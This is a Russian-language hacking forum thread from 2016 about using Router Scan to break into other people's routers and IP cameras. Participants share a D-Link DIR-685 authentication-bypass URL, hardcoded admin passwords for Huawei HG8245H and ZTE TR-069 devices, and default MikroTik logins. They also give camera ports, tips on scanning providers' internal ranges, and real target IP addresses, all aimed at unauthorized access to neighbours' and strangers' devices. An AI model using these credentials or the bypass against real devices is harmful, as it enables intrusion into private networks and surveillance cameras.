mtd4: 00100000 00010000 "jffs2"
В приведенном примере nvram лежит /dev/mtd3
Можно конечно все перебрать, их немного, но роутер вероятно упадёт при попытке подгрузки mtd1: 007d0000 00010000 "linux"
Подгрузка /dev/mtdblockX практически гарантирует (на99%) падение роутера, по крайней мере WEB сервиса.
(хотя говорят, что в этих моделях пасс админа на web лежит именно в /dev/mtdblock3)
Проверяйте.
что ж за беда такая! знаю, что соседи в моей сети, знаю BSSID and ESSID, но RS упорно их не видит!!?
что ж за беда такая! знаю, что соседи в моей сети, знаю BSSID and ESSID, но RS упорно их не видит!!?
Может быть их роутеры не имеют известных уязвимостей.
Либо, как у моего провайдера, некоторые роутеры находятся в основном диапазоне, а большая часть, в локальном диапазоне.
Возможно у тебя такая же ситуация, поэтому ты их и не видишь.
Triton_Mgn
30.01.2016, 01:05
Может быть их роутеры не имеют известных уязвимостей.
Либо, как у моего провайдера, некоторые роутеры находятся в основном диапазоне, а большая часть, в локальном диапазоне.
Возможно у тебя такая же ситуация, поэтому ты их и не видишь.
rs не видит вешнее управление прикрыто
Triton_Mgn
30.01.2016, 01:06
информация ценная. таблица - тоже хорошо. только на мой взгляд лучше было бы создать таблицу с данными эксплойтов и описания уязвимостей ( типа того, что описал уважаемый Felis-sapiens), а не просто таблицу с роутерами и информацией о том, берет его ривер или нет. со всем уважением к автору темы таблиц.
кстати, предлагаю еще создать тему по апикамерам которые определяются роутерсканом. самому создавать и вести тему нет возможности. если есть желающие - буду участвовать. в теме главное выкладывать стартовые страницы входа на различные камеры, чтобы првильно определить какие пробовать дефолтные пароли или эксплойты. может заодно и получится пополнить базу роутерскана, когда автор к нам вернется
п.с. хороший сайт. https://www.ispyconnect.com/sources.aspx уязвимости апи камер.
Класс мы и пытаемся сделать это
Triton_Mgn
30.01.2016, 01:15
Класс мы и пытаемся сделать это
Вот ты молодец ответил и сайт еще привел, а тема добавь
Network Surveillance DVR
Через что лучше заходить на эти камеры?
ie постоянно просит качать сертификат, но даже с ним работает криво.
Triton_Mgn
30.01.2016, 02:28
Network Surveillance DVR
Через что лучше заходить на эти камеры?
ie постоянно просит качать сертификат, но даже с ним работает криво.
Так сама камера тебе говорит об устновке ПО. Где мы ждем.
И я так думаю не увидит! RS видит роутеры только тех пользователей которые использовали эту программу для сканирования. Мы сами раскрываем свои учетные данные а программа собирает их в базу. Это чисто мое мнение, на достоверность не претендую.
Бред чистой воды.
Network Surveillance DVR
Через что лучше заходить на эти камеры?
ie постоянно просит качать сертификат, но даже с ним работает криво.
http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL101713
Вот ты молодец ответил и сайт еще привел, а тема добавь
вы невнимательно читаете. я же сказал - нет возможности вести тему.участвовать могу, а модерировать - нет.и, кстати, знаки препинания хоть ставьте временами, а то тяжело иногда понять что вы хотите сказать.
panfilov-25
02.02.2016, 22:52
И я так думаю не увидит! RS видит роутеры только тех пользователей которые использовали эту программу для сканирования. Мы сами раскрываем свои учетные данные а программа собирает их в базу. Это чисто мое мнение, на достоверность не претендую.
что за бред несешь?
мой роутер имел логин:пасс админ/админ и RS его успешно вскрыл. Стоило мне поменять эти данные и RS оказался бессилен.
Теперь подумай дальше сам над своими словами!
И я так думаю не увидит! RS видит роутеры только тех пользователей которые использовали эту программу для сканирования. Мы сами раскрываем свои учетные данные а программа собирает их в базу.
точно. роутерскан - программа шпион. и кстати - она сливает инфу по роутерам анб, игилу и парагвайской разведке. не используйте ее, а то ваш роутер будет в опасности. мы-то уж ладно. лоханулись все. а вы - спасайтесь пока возможно.
п.с. интересно и какие данные анализа вас натолкнули на такие предположения?
Triton_Mgn
02.02.2016, 23:10
что за бред несешь?
мой роутер имел логин:пасс админ/админ и RS его успешно вскрыл. Стоило мне поменять эти данные и RS оказался бессилен.
Теперь подумай дальше сам над своими словами!
Некоторые роутеры RS вкрывает независимо от логина -пароля.
demon1959
02.02.2016, 23:14
что за бред несешь?
мой роутер имел логин:пасс админ/админ и RS его успешно вскрыл. Стоило мне поменять эти данные и RS оказался бессилен.
Теперь подумай дальше сам над своими словами!
Тоже менял данные, и все равно RS вскрывал их. Видно у вас особенные данные.
Тоже менял данные, и все равно RS вскрывал их. Видно у вас особенные данные.
Видимо у тебя ущербный роутер с дырявой прошивкой, которая позволяет вытащить данные в обход авторизации, в т.ч. сами данные авторизации.
demon1959
02.02.2016, 23:38
Видимо у тебя ущербный роутер с дырявой прошивкой, которая позволяет вытащить данные в обход авторизации, в т.ч. сами данные авторизации.
Рад за вас, и ваш роутер. Меня устраивает то что есть. Просьба не пинать, я высказал свое мнение, если оно не совпадает с вашим это не значит что его у меня не должно быть
Triton_Mgn
02.02.2016, 23:42
Тоже менял данные, и все равно RS вскрывал их. Видно у вас особенные данные.
Видно пора роутер поменять, или закрыть доступ с внешки.
demon1959
02.02.2016, 23:44
Видно пора роутер поменять, или закрыть доступ с внешки.
Спасибо за совет.
Скажите пожалуйста, есть один роутер, роутер скан показывает вход в веб морду по User/пусто
Но при входе с такими параметрами все настройки недоступны, все кнопки неактивны.
А роутер этот мне очень нужен...
Как-то возможно зайти в настройки с параметрами админа и сделать свои дела ?
Роутер Dlink DIR-615
Спасибо за совет.
А еще лучше в другую страну переехать ,а то может RS и к новому роутеру доберётся
Тоже менял данные, и все равно RS вскрывал их. Видно у вас особенные данные.
У тебя просто роутер особенный, модели "Решето"
что ж за беда такая! знаю, что соседи в моей сети, знаю BSSID and ESSID, но RS упорно их не видит!!?
Если у соседей закрыт доступ к админке из внешней сети, то RS тут уж ничего не сделает
demon1959
03.02.2016, 09:49
точно. роутерскан - программа шпион. и кстати - она сливает инфу по роутерам анб, игилу и парагвайской разведке. не используйте ее, а то ваш роутер будет в опасности. мы-то уж ладно. лоханулись все. а вы - спасайтесь пока возможно.
п.с. интересно и какие данные анализа вас натолкнули на такие предположения?
Проверьте роутер здесь (http://3wifi.stascorp.com/find) до сканирования и после. Так же там данные тех кто использовал сканер. И к стати у меня WIFI открытый, это просто проводил эксперименты.
demon1959
03.02.2016, 10:03
что за бред несешь?
мой роутер имел логин:пасс админ/админ и RS его успешно вскрыл. Стоило мне поменять эти данные и RS оказался бессилен.
Теперь подумай дальше сам над своими словами!
Подредактируйте auth_basic.txt и auth_digest_txt и будет вам счастье.
demon1959
03.02.2016, 10:26
что за бред несешь?
мой роутер имел логин:пасс админ/админ и RS его успешно вскрыл. Стоило мне поменять эти данные и RS оказался бессилен.
Теперь подумай дальше сам над своими словами!
Проверьте мак адрес вашего роутера здесь (http://3wifi.stascorp.com/find). Можно без ESSID. Только войдите в аккаунт хотя бы гостевой.
demon1959
03.02.2016, 10:34
что ж за беда такая! знаю, что соседи в моей сети, знаю BSSID and ESSID, но RS упорно их не видит!!?
Аналогично! Даже знаю IP этих соседей. И чтобы это значило?
Felis-Sapiens
03.02.2016, 11:28
ZyXEL Keenetic Lite II
К кинетикам вроде нет эксплойтов. Что, Router Scan показывает пароль wifi даже если поменять пароль на вход в веб-интерфейс на какой-нибудь типа sk2dJAhgS2Dhf23 и при этом его нет ни в auth_basic.txt, ни в Use Credentials ?
demon1959
03.02.2016, 11:47
К кинетикам вроде нет эксплойтов. Что, Router Scan показывает пароль wifi даже если поменять пароль на вход в веб-интерфейс на какой-нибудь типа sk2dJAhgS2Dhf23 и при этом его нет ни в auth_basic.txt, ни в Use Credentials ?
Если его нет auth_basic.txt то не показывает. Я же говорил что изменил auth_basic.txt.
Проверьте роутер здесь (http://3wifi.stascorp.com/find) до сканирования и после. Так же там данные тех кто использовал сканер. И к стати у меня WIFI открытый, это просто проводил эксперименты.
а сколько данных тех, кто не использовал роутерскан,не считали ? исключите свой айпи из сканирования и вашего роутера там не будет. в чем проблема? это еще не дает оснований утверждать ( или предполагать), что роутерскан шпионит за теми, кто его использует. он вскрывает все роутеры попадающиеся ему под горячую руку ( естественно, при наличии уязвимостей в них). не нужно делать скоропалительных выводов, тем более основанных не на знании основ программирования и анализа, а только основывающихся на поверхностных эмоциональных предположениях.
demon1959
03.02.2016, 15:55
а сколько данных тех, кто не использовал роутерскан,не считали ? исключите свой айпи из сканирования и вашего роутера там не будет. в чем проблема? это еще не дает оснований утверждать ( или предполагать), что роутерскан шпионит за теми, кто его использует. он вскрывает все роутеры попадающиеся ему под горячую руку ( естественно, при наличии уязвимостей в них). не нужно делать скоропалительных выводов, тем более основанных не на знании основ программирования и анализа, а только основывающихся на поверхностных эмоциональных предположениях.
А никто и не утверждал что роутерскан шпионит. А сказал что мы сами ему разрешаем собирать данные в базу. Внимательней читайте и не делайте скоропалительных выводов.
Triton_Mgn
03.02.2016, 16:28
А никто и не утверждал что роутерскан шпионит. А сказал что мы сами ему разрешаем собирать данные в базу. Внимательней читайте и не делайте скоропалительных выводов.
Так запрети.
erwerr2321
04.02.2016, 04:33
Бля, а шо с binarymaster' ом то?
Куда он пропал? С ним всё в порядке? Кто в курсе, парни?
а шо с binarymaster' ом то?
на своем сайте он написал:
....занят написанием диссертации, а также некоторыми другими проектами.....
.....Проект заморожен до июля 2016!.....
А никто и не утверждал что роутерскан шпионит.Внимательней читайте и не делайте скоропалительных выводов.
я читаю всегда очень внимательно.
И я так думаю не увидит! RS видит роутеры только тех пользователей которые использовали эту программу для сканирования.
или это не ваша фраза? причем в столь категоричной форме, как будто вы уже декомпилировали код и прошлись по исходникам. хотя, как заметил уважаемый Felis-Sapiens - вы даже не удосужились ознакомитсья с инструкцией пользователя. сбор информации о пользователе программы и опубликование ее это не разновидность шпионажа? к тому же я сказал,что на сайте 3wifi данные не только тех кто использовал программу. но на это вы не обратили внимания видимо потому, что это прямо противоречит вашему предположению.
demon1959
04.02.2016, 16:02
я читаю всегда очень внимательно. или это не ваша фраза? причем в столь категоричной форме, как будто вы уже декомпилировали код и прошлись по исходникам. хотя, как заметил уважаемый Felis-Sapiens - вы даже не удосужились ознакомитсья с инструкцией пользователя. сбор информации о пользователе программы и опубликование ее это не разновидность шпионажа? к тому же я сказал,что на сайте 3wifi данные не только тех кто использовал программу. но на это вы не обратили внимания видимо потому, что это прямо противоречит вашему предположению.
Ну не так выразился SORRY
доброго времени суток всем. был на офсайте программы. там товарищ macbeton выложил эксплойтик на D-Link DIR-685
сам эксплойт :
/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
проверено. срабатывает на все 100 может кому пригодится, пока автор к нам не вернется в июле.
Felis-Sapiens
04.02.2016, 20:26
/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
В Router Scan этот эксплойт есть, но только для некоторых разновидностей моделей DAP-1353, DAP-1360, DIR-300, DIR-320, DIR-615 Rev. B1G.
В Router Scan этот эксплойт есть, но только для некоторых разновидностей моделей DAP-1353, DAP-1360, DIR-300, DIR-320, DIR-615 Rev. B1G.
ну здесь, допустим в роутерскане не сработал 85.24.164.58:88
Felis-Sapiens
04.02.2016, 22:39
ну здесь, допустим в роутерскане не сработал 85.24.164.58:88
Так я же не спорю, что поддержки этого эксплойта для DIR-685 сейчас нет.
Так я же не спорю, что поддержки этого эксплойта для DIR-685 сейчас нет.
дык и я не спорил пытался прояснить для себя ситуэйшн
Как добавить эти эксплойти
Как добавить эти эксплойти
есть несколько вариантов. декомпилировать код программы, разобраться в коде и добавить. второй - дождаться когда разработчик вернется и добавит. третий - когда роутерскан находит такие роутеры проверять вручную
pomestnik
05.02.2016, 11:08
Ну подскажите по программке.
1)Какие еще распространенный порты рекомендуется ставить для сканирования, кроме дефолтных ? (80, 8080, 1080)
Я подключился к известному мне ви-фи. Посмотрел ip шник через сайт.
Задал диапазон этот просканировать. Но данный роутер там не нашелся. Роутер длинковский-стандартный ( модель не помню). Админка на стандартных паролях.
Также пробовал просканировать диапазон сети роутера 192.168.0.0/24 - в своей же сетке он тоже не нашелся сканом. (его ип 192.168.0.1)
Сам порт он вообще в роутере где то выставляется в настройках?
2) И еще не понятна методика вычисления диапазона локалки провайдера
Допустим делаю трейс на 8.8.8.8
Если в узлах не встречаются IP адресса из диапазона частных
10.0.0.0 — 10.255.255.255
172.16.0.0 — 172.31.255.255
192.168.0.0 — 192.168.255.255
То локалка на пути не встретилась, и мне далее надо наобум трейсить произвольный IP из частных диапазонов(указанных выше). ?
Еще в роутере есть параметр IP адрес физического WAN интерфейса = 192.168.40.55 - это я так понимаю и есть одна из локалок провайдера?
erwerr2321
05.02.2016, 12:58
Ну подскажите по программке.
Какие еще распространенный порты рекомендуется ставить для сканирования, кроме дефолтных ? (80, 8080, 1080)
Я подключился к известному мне ви-фи. Посмотрел ip шник через сайт.
Задал диапазон этот просканировать. Но данный роутер там не нашелся. Роутер длинковский-стандартный ( модель не помню). Админка на стандартных паролях.
Также пробовал просканировать диапазон сети роутера 192.168.0.0/24 - в своей же сетке он тоже не нашелся сканом. (его ип 192.168.0.1)
Сам порт он вообще в роутере где то выставляется в настройках?
Вообще ты какие-то небылицы и глупости рассказываешь и делаешь..!
Я подключился к известному мне ви-фи. Посмотрел ip шник через сайт.
Задал диапазон этот просканировать. Но данный роутер там не нашелся. Роутер длинковский-стандартный ( модель не помню). Админка на стандартных паролях.
Зачем тебе сайт и вообще что-то, если тебе и так всё известно!? Ради эксперимента? ОК!
Теперь так, ты должен раз и навсегда уяснить, если морда роутера доступна по WLAN (опять же, раз ты знаешь, что она на стандартных паролях, значит ты к ней подключался, соответственно вопрос с портом отпадает сам собой) - это ещё не значит, что она будет доступна
из внешней сети ( например, там отключено удалённое управление, либо провайдер может резать доступ по 80 порту и тд ) !
Его внешний IP скорее всего динамический!
И если всё, как ты говоришь, стандартно, то 95%, что там действительно ВСЁ СТАНДАРТНО!
На другие случаи есть сканеры портов, всякие там NMAP' ы и ежи с ними, если что, они тебе всё расскажут!
pomestnik
05.02.2016, 13:10
Теперь так, ты должен раз и навсегда уяснить, если морда роутера доступна по WLAN (опять же, раз ты знаешь, что она на стандартных паролях, значит ты к ней подключался, соответственно вопрос с портом отпадает сам собой)
А верно ли будет утверждение что из внутренней сети провайдера будет доступ ко всем роутерам ?
Допустим ситуация: есть две точки от одного провайдера. Есть доступ извне только к одной из них. Если подключаемся к ней и подбираем верный диапазон ип для внутренней сетки, то по идее вторую точку мы сможем обнаружить? Или пров может блочить порты и внутри сетки?
Triton_Mgn
05.02.2016, 15:38
Блин пока binarymaster занят может куда то складывать информацию о спрлойтах, а то растеряются, в то же время кто то говорил, что только летом к нам придет, не до кучи будет
А верно ли будет утверждение что из внутренней сети провайдера будет доступ ко всем роутерам ?
Допустим ситуация: есть две точки от одного провайдера. Есть доступ извне только к одной из них. Если подключаемся к ней и подбираем верный диапазон ип для внутренней сетки, то по идее вторую точку мы сможем обнаружить? Или пров может блочить порты и внутри сетки?
Неверно, все тоже самое, что объяснил ms13.
CRACK211
05.02.2016, 16:01
можно тему создать отдельную с жесткими правилами только эксплоиты))?
erwerr2321
05.02.2016, 16:02
можно тему создать отдельную с жесткими правилами только эксплоиты))?
...ТОЛЬКО HARDCORE!!!
можно тему создать отдельную с жесткими правилами только эксплоиты))?
достаточно в сообщении в эксплоитом писать ченить типа #exploit , тогда поиском сразу все нужные сообщения будет видно
Ребята, а где здесь была тема router scan на android, или ее удалии? Чёт найти не могу.
magnetic
06.02.2016, 21:32
Ребят, просканил внутреннюю локалку. В итоге себя нашел и еще 1го чела с поселка. Но точек то в послеке у нас за 200, если честно. Все перепробовал, не могу получить все точки. Сканю внутреннюю - получаю одну точку какого-то чела. Сканю внешний, получаю левые точки. Хотя на карте 19 точек кто-то хакнул уже. Но Вот эти 19 меня не инетересуют, а вот остальные... 38:17:66:04:7A:78
00:1F:CE:746:98 попробуйте а. Провайдер К-Телеком. По скану чисто диапозона провайдера выдает областные точки, но ни как не с поселка. Буду дико благодарен
CRACK211
06.02.2016, 21:58
Ребят, просканил внутреннюю локалку. В итоге себя нашел и еще 1го чела с поселка. Но точек то в послеке у нас за 200, если честно. Все перепробовал, не могу получить все точки. Сканю внутреннюю - получаю одну точку какого-то чела. Сканю внешний, получаю левые точки. Хотя на карте 19 точек кто-то хакнул уже. Но Вот эти 19 меня не инетересуют, а вот остальные... 38:17:66:04:7A:78
00:1F:CE:746:98 попробуйте а. Провайдер К-Телеком. По скану чисто диапозона провайдера выдает областные точки, но ни как не с поселка. Буду дико благодарен
Населённый пункт сказать не хотите?)
erwerr2321
06.02.2016, 22:00
Населённый пункт сказать не хотите?)
Некорректный вопрос, человек и так уже всё что надо рассказал! ))
Ребята, а где здесь была тема router scan на android, или ее удалии? Чёт найти не могу.
Значит смотрел плохо, вот же она
https://forum.antichat.ru/threads/435481/
CRACK211
09.02.2016, 16:59
зато сколько вэбок открытых.... даже сплойтить не нужно у них там что, открытый просмотровый зал ?
на каких портах чаще всего висят камеры?
magnetic
09.02.2016, 17:33
на каких портах чаще всего висят камеры?
Все пробовал. Внутренние и внешку. 0 эффекта. У знакомиого через Рос телеком попробую. Что тама с вебками?)
на каких портах чаще всего висят камеры?
81; 8000 ; 8080
445 но тут подключаться не через браузер.
только что скачал архив для теста проги. подскажите пароль на архив.
magnetic
09.02.2016, 20:41
81; 8000 ; 8080
445 но тут подключаться не через браузер.
А какие могут быть причины того, что у К-телекома не ищется у меня ничего? А вот по наблюдениям у Ростелекома, внутренняя локалка очень выделяется адресом(отличается от стандартных аресов), их спокойно найду на днях... А вот К-телеком....
erwerr2321
09.02.2016, 21:41
81; 8000 ; 8080
445 но тут подключаться не через браузер.
на каких портах чаще всего висят камеры?
binarymaster' а на Вас нету!
magnetic
10.02.2016, 00:21
Может позвонить в ТП и спросить какой диапозон нужно просканить?
magnetic
10.02.2016, 00:33
И еще интересная тема, почему, введя в проге чужой ип не получаешь его лог и пас, или же элементарно свой. Только внутренний и получаешь...
erwerr2321
10.02.2016, 00:34
Может позвонить в ТП и спросить какой диапозон нужно просканить?
Magneto, не гони!
Ты лучше скажи, на шо тебе тот диапазон сдался!? Да и в том ТП не такие уж и ТП сидят, как ты думаешь, еси они доступ по порту порезали..., то можешь звонить хоть в Лигу Наций!
На практике - сколько router scan'у можно максимально скормить ip?
После 10000 выводится предупреждение в окне адресов, но софт вроде работает.
binarymaster' а на Вас нету!
и в чем проблема? из темы роутерскана никто не выходит
у Ростелекома, внутренняя локалка очень выделяется адресом(отличается от стандартных аресов), их спокойно найду на днях... А вот К-телеком....
зайди на
https://2ip.com.ua/ru/services/information-service/provider-ip?ip=94.230.128.0&a=act
обычно этим сервисом пользуюсь. хорошая база блоков IP по провайдерам.блоков апи у данного провайдера немного больше
magnetic
10.02.2016, 20:13
зайди на
https://2ip.com.ua/ru/services/information-service/provider-ip?ip=94.230.128.0&a=act
обычно этим сервисом пользуюсь. хорошая база блоков IP по провайдерам.блоков апи у данного провайдера немного больше
Но самое старнное по внутреннему ИП одну точку то находит. А вот Zmap для винды не предусмотрен?
А вот Zmap для винды не предусмотрен?
https://nmap.org/download.html
Triton_Mgn
11.02.2016, 09:58
Диапазон провайдера скудный, да еще и не факт, что на роутерах удаленное управление включено, поймайте хендшейк лучше.
pro100boy
11.02.2016, 10:06
вопрос в том что я не на месте,может как то к локалке можно подключится и так просканить? вот скрин с одной комнати.... https://pp.vk.me/c628416/v628416033/3e5c9/wRiZwBHz9LY.jpg
Triton_Mgn
11.02.2016, 10:19
вопрос в том что я не на месте,может как то к локалке можно подключится и так просканить? вот скрин с одной комнати.... https://pp.vk.me/c628416/v628416033/3e5c9/wRiZwBHz9LY.jpg
Я просканировал диапазон провайдера, чтоты дал там мало чего есть, а ты уверен, что на скриншоте именно этот провайдер? Что за город? Легче или сканировать диапазон всего города, либо ловить хендшейк, Город можешь кинуть в личку.
вопрос в том что я не на месте,может как то к локалке можно подключится и так просканить?
Подключись хоть к одному из этих роутеров, и посмотри ip, который ему дал провайдер. Там скорее всего будет сеть 10.x.x.x Вот ее и сканировать надо. Или проси у кого-то из студиков мобильным роутер сканом прогнать сеть. Но по своему опыту скажу, что неблагодарное это дело, студенткие вафли ломать. Почти всегда доступ к роутерам извне закрыт, половина сетей - раздача инета с ноута.
пысы - как минимум, 1 роутер со скрина можно вскрыть сходу, ещё 3 под вопросом, но тоже возможно. (используя только лишь уязвимости wps)
magnetic
12.02.2016, 00:31
Так, NMap'om просканил сеть с 10.0.0.0-10.0.255.255, кто шарит отпишите, кину в личку что нужно, для того, чтобы узнать причину, почему роутеры к-телекома не видно. Но парадокс в том, что всех, кого я смотрел у этого провайдера, имеют открытый 80 порт и адрес с 10...
chugunkin
12.02.2016, 03:10
Так, NMap'om просканил сеть с 10.0.0.0-10.0.255.255, кто шарит отпишите, кину в личку что нужно, для того, чтобы узнать причину, почему роутеры к-телекома не видно. Но парадокс в том, что всех, кого я смотрел у этого провайдера, имеют открытый 80 порт и адрес с 10...
Лично мне мало попадалось локалок провайдера 10.0.х.х. Обычно 10.10.; 10.50. 10.0 это что сканер выдал?
panfilov-25
15.02.2016, 09:40
Опыт взлома камер уже есть. Был как то пост на пикабу.
Единственное не могу найти программу, помню что называлась Крот или что тотв этом роде. Поток был простотогромный. Порты сканила любые . Суть программы, она по диапазону ип подбирает порты, если порты есть она выводит их в список.
Если кто знает такую, скиньте пожалуйста
Опыт взлома камер уже есть. Был как то пост на пикабу.
Единственное не могу найти программу, помню что называлась Крот или что тотв этом роде. Поток был простотогромный. Порты сканила любые . Суть программы, она по диапазону ип подбирает порты, если порты есть она выводит их в список.
Если кто знает такую, скиньте пожалуйста
Таких программ - сканеров портов миллион...например кроссплатформенный nmap:https://nmap.org/man/ru/
MacrosUI
15.02.2016, 16:08
Итак...все же решил зарегатся и отписатся.юзаю RS очень давно....так вот при использовании последней версии начал что то я очень сильно сомневатся в прозрачности этой софтинки...Задам вам вопрос посмотрю ваши ответы....и потом продолжу...Вы Роутеры Микротик находите?если раньше они попадались то теперь как отрубило...сканю по отдельным странам
Итак...все же решил зарегатся и отписатся.юзаю RS очень давно....так вот при использовании последней версии начал что то я очень сильно сомневатся в прозрачности этой софтинки...Задам вам вопрос посмотрю ваши ответы....и потом продолжу...Вы Роутеры Микротик находите?если раньше они попадались то теперь как отрубило...сканю по отдельным странам
Прошивка обновилась - уязвимость ушла.
Итак...все же решил зарегатся и отписатся.юзаю RS очень давно....так вот при использовании последней версии начал что то я очень сильно сомневатся в прозрачности этой софтинки...Задам вам вопрос посмотрю ваши ответы....и потом продолжу...Вы Роутеры Микротик находите?если раньше они попадались то теперь как отрубило...сканю по отдельным странам
Вот здесь есть немного: 87.76.32.0-87.76.63.255 , но не открывает.
Felis-Sapiens
15.02.2016, 17:53
Прошивка обновилась - уязвимость ушла.
Уязвимости и не было никогда - RS проверяет только несколько зашитых в парсере паролей, поэтому так мало их открывает. В новых версиях мог смениться алгоритм авторизации - не проверял.
magnetic
15.02.2016, 20:20
Так, просканил внутреннюю локу Ростелекома. Как итог 496 точек. Нажал на "аплоад то 3вифи" , но что-то на карте не увидел изменений.
UNIXTREID
15.02.2016, 20:59
Возникла такая проблема: сканил программой диапазон одного провайдера (небольшого). В общем пересканировал периодически на наличие новых точек. Но недавно обнаружил, что RS больше ничего не находит в этом отрезке. Вышел через одну из точек крякнутых - IP тот же, но теперь ни он, ни другие даже не пингуются. Короче, думаю, пров что-то намутил, что теперь до точек не достучаться (думаю, как-то централизованно). У кого-то возникали похожие ситуации? Теперь RS бесполезен в таком диапазоне?
MacrosUI
16.02.2016, 03:09
Уязвимости и не было никогда - RS проверяет только несколько зашитых в парсере паролей, поэтому так мало их открывает. В новых версиях мог смениться алгоритм авторизации - не проверял.
ребята ну что вы вообще говорите! микротик брался всегда по умолчанию Логин Admin пасс пусто..какая уязвимость!
MacrosUI
16.02.2016, 03:24
Уязвимости и не было никогда - RS проверяет только несколько зашитых в парсере паролей, поэтому так мало их открывает. В новых версиях мог смениться алгоритм авторизации - не проверял.
алгоритм тут не причем...я к чему клоню..как будто валид пропускает...ребята проверьте пожалуйста у кого есть микротик ..в RS отобразится?
у них Логин Admin Пароль Пусто по умолчанию
алгоритм тут не причем...я к чему клоню..как будто валид пропускает...ребята проверьте пожалуйста у кого есть микротик ..в RS отобразится?
у них Логин Admin Пароль Пусто по умолчанию
проверял. отображается.по диапазону моего города были три с дефолтами. роутерскан пробивал пароль до тех пор пока пароли не сменили. роутерксан тестовый.
как будто валид пропускает...
Некоторые микротики пропускает, это уже извесно. binarymaster'y уже писали, он фиксил. Стало пропускать меньше. Доделает когда освободится от работы
zerokul1972
17.02.2016, 05:57
Программа неплохая !!!
Вот узнать хочется про модель TP-LINK Wireless N Router WR841N, их много таких но ни логинов не паролей нет их просто пропускает
TP-LINK Wireless N Router WR841N
нет на туполинки известных уязвимостей, которые позволяют подрезать пароль от адмники. на некаторых старых ревизиях работал эксплойт, позволяющий получить некоторые данные от wifi сети в обход авторизации.
в новых прошивках huawei hg8245h
telecomadmin \ s2Mu5LrUYXvoRGxWT0By8D1QCmOpdKgAqjIcE7i6w94VtzJnbH
superadmin \ haPie9goHf
telecomadmin \ xyz
Нашел на просторах инета статейку про RS , прочтите что люди пишут про программу: http://pikabu.ru/story/moyo_kratkoe_dopolnenie_pro_vzlom_vayfaya_4016638# comments
Нашел на просторах инета статейку про RS
Комментарии понравились
...нельзя такое выкладывать в широкий доступ с кучей детей-пользователей- кому надо сами найдут, а то родителям придется отдуваться за свое чадо слабоумное и доказывать, что они никакой не хацкер, а просто долбоеб малолетний....
http://i73.fastpic.ru/big/2016/0224/1b/908c144c90b596432d6baff244c9fc1b.jpg
нельзя такое выкладывать в широкий доступ с кучей детей-пользователей
Это та куча, которая не может найти пароль к архиву?
Раньше в предыдущих версиях такой баг не встречал в 2.53 сканирование закончилось а прога остается в поиске как будто колодки стерлись и тормоза отказали
кто нибудь пробывал сеть киевстар сканировать. вообще по нулям. у меня есть ip внешний роутера, mac его есть. может кто помочь узнать все остальное?
кто нибудь пробывал сеть киевстар сканировать. вообще по нулям.
Надо пробовать по внутренним адресам, как локалку 10.х.х.х или 100.х.х.х
Снаружи эта сеть почти полностью закрыта.
Кто-нибудь сталкивался с роутерами WiFire? Вроде как в сети netbynet находятся. Какие там обычно по дефолту пароли/пины?
как нибудь можно настроить, чтоб она сканила определенную марку роутера,
чтоб скан шел быстрей,а другие отсеивались моментально?
вот еще на HG8245H
telecomadmin\YAqyUK7JRjaWdOwZ8xhVkf9L45PtmMcsQXnEv SuCgpTir3IHe6
Felis-Sapiens
04.03.2016, 14:34
как нибудь можно настроить, чтоб она сканила определенную марку роутера,
чтоб скан шел быстрей,а другие отсеивались моментально?
Можно настроить правила фильтрации.
Ребят, сори за флуд!
а есть какая нибудь програмка,которая все скрипты и всю инфу с роутера вытащит?
binarymaster
09.03.2016, 00:01
Ребят, сори за флуд!
а есть какая нибудь програмка,которая все скрипты и всю инфу с роутера вытащит?
Можно использовать Charles, но при этом придётся вручную походить по страницам веб интерфейса роутера.
Из автоматизированных знаю лишь Teleport Pro.
Можно использовать Charles, но при этом придётся вручную походить по страницам веб интерфейса роутера.
Из автоматизированных знаю лишь Teleport Pro.
спс!буду пробывать
chugunkin
11.03.2016, 22:50
binarymaster
Вопрос к разработчику...функция Use credentials
1. Не нашел абсолютно нигде но точно знаю, что в этой функции возможно использовать подстановочные символы для
опции "Password". Пример - "%i%i%i%i" - будет подставлять значения из IP'шника проверяемого.
Какие еще подстановочные символы возможны для этой опции?
2. Нельзя ли добавить для этой функции проверку роутеров D-Link-300NRU rev.B5/B6(v.2.5.4; v.2.5.11; v.2.5.12; v.2.5.19) и аналогичных D-Link'ов.
Felis-Sapiens
11.03.2016, 23:13
1. Не нашел абсолютно нигде но точно знаю, что в этой функции возможно использовать подстановочные символы для
опции "Password". Пример - "%i%i%i%i" - будет подставлять значения из IP'шника проверяемого.
Какие еще подстановочные символы возможны для этой опции?
Это недокументированная фича
Вот честно, не помню, когда я добавил эту фичу. Скажу лишь, что доступны только эти переменные -
%i# - подставляет октет адреса IPv4
%iz# - аналогично, но ещё дополняет нулями слева до длины 3-х символов
Других переменных пока нет, и оно работает только в контексте этой функции (для словарей basic/digest не работает).
2. Нельзя ли добавить для этой функции проверку роутеров D-Link-300NRU rev.B5/B6(v.2.5.4; v.2.5.11; v.2.5.12; v.2.5.19) и аналогичных D-Link'ов.
Не совсем понял, эта функция (Use credentials) не привязана к конкретным моделям роутеров.
chugunkin
12.03.2016, 01:56
Это недокументированная фича
Не совсем понял, эта функция (Use credentials) не привязана к конкретным моделям роутеров.
Кто-бы понял...- но на роутерах D-Link-300 NRU rev.B5/B6 и аналогичным по интерфейсу
функция (Use credentials) отрабатывает как и должна, а на D-Link-300 и и ему подобным - без "NRU" не подбирает.
Ну и спасибо, конечно...
denlenin
13.03.2016, 21:40
и всё же, как бы изломать домрушные ZTE ZXHN H118N, у которых снаружи открыт только порт tr069?
ко всем подходит пароль cracs:Snyk9Tl24v75fHr9Jn9V а вот дальше то чего с ними сделать?
5.166.69.39 1050 31 Done dirname
5.166.69.45 1050 32 Done dirname
5.166.69.49 1050 31 Done dirname
binarymaster
13.03.2016, 23:09
и всё же, как бы изломать домрушные ZTE ZXHN H118N, у которых снаружи открыт только порт tr069?
ко всем подходит пароль cracs:Snyk9Tl24v75fHr9Jn9V а вот дальше то чего с ними сделать?
5.166.69.39 1050 31 Done dirname
5.166.69.45 1050 32 Done dirname
5.166.69.49 1050 31 Done dirname
То есть TR-069 основан на HTTP? Не знал. Или так только с этими роутерами?
Там должны быть свои API вызовы, в том числе позволяющие открыть порт или включить удалённое администрирование.
denlenin
13.03.2016, 23:43
То есть TR-069 основан на HTTP? Не знал. Или так только с этими роутерами?
Там должны быть свои API вызовы, в том числе позволяющие открыть порт или включить удалённое администрирование.
